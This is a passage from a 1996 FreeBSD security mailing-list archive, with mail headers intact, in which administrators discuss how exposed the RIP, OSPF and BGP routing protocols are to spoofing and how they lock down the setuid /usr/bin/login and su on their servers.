X-Loop: FreeBSD.org Precedence: bulk Will Brown writes: > Seems to me that routing protocols such as RIP, OSPF, BGP, etc. would > be juicy targets for attack, yet I have never heard of any such attacks > or vulnerability - as though they are somehow immune, or have been > overlooked, or I have me head in sand. > BGP is hardest of these since it's connection oriented and spoofing that is pretty close to impossible. Sending fake RIP entries is trivial, OSPF (when run without authentication) is doable but not easy. > Yes I are hackere loking to you tell me how to cwack your systemes > in fun new way :) > If you are concerned with routing security, run your routing protocols with authentication enabled. This specially stands true for your IGP. (for which OSPF is a good choice) Pete From owner-freebsd-security Thu Jul 18 05:16:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA14804 for security-outgoing; Thu, 18 Jul 1996 05:16:59 -0700 (PDT) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA14799 for ; Thu, 18 Jul 1996 05:16:57 -0700 (PDT) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id FAA00973; Thu, 18 Jul 1996 05:16:54 -0700 From: Nathan Lawson Message-Id: <199607181216.FAA00973@kdat.calpoly.edu> Subject: Re: suidness of /usr/bin/login To: taob@io.org (Brian Tao) Date: Thu, 18 Jul 1996 05:16:54 -0700 (PDT) Cc: freebsd-security@freebsd.org In-Reply-To: from "Brian Tao" at Jul 16, 96 00:37:14 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > On 16 Jul 1996, Michael Graff wrote: > > > > you can always use ``login foo'' and that is supposed to let someone else > > log in, kinda in mid session and all. > > Hmmm... that's hardly ever done, at least around here. "exec > telnet localhost" would serve the same purpose, I guess. I run all my systems with login mode 500. I also keep su group wheel, but not world executable. My justification for this is that there should only be one legitimate way into the system (telnet/login), making it easier to monitor that one door. I see no reason to leave shell users with any method of switching to another account without reauthenticating themselves. Please note that this policy is used for my ISP's, and yours may vary according to your application. -- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root." CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Thu Jul 18 06:39:09 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id GAA18000 for security-outgoing; Thu, 18 Jul 1996 06:39:09 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id GAA17994 for ; Thu, 18 Jul 1996 06:39:06 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id JAA04520; Thu, 18 Jul 1996 09:38:54 -0400 (EDT) Date: Thu, 18 Jul 1996 09:38:54 -0400 (EDT) From: Brian Tao To: Nathan Lawson cc: freebsd-security@freebsd.org Subject: Re: suidness of /usr/bin/login In-Reply-To: <199607181216.FAA00973@kdat.calpoly.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 18 Jul 1996, Nathan Lawson wrote: > > Please note that this policy is used for my ISP's, and yours may vary > according to your application. Yep, I like that policy too. The majority of our users think the little Netscape icon on their Win95 desktop is "the Internet", so stricter enforcement on logins won't even affect them. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Senior Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't"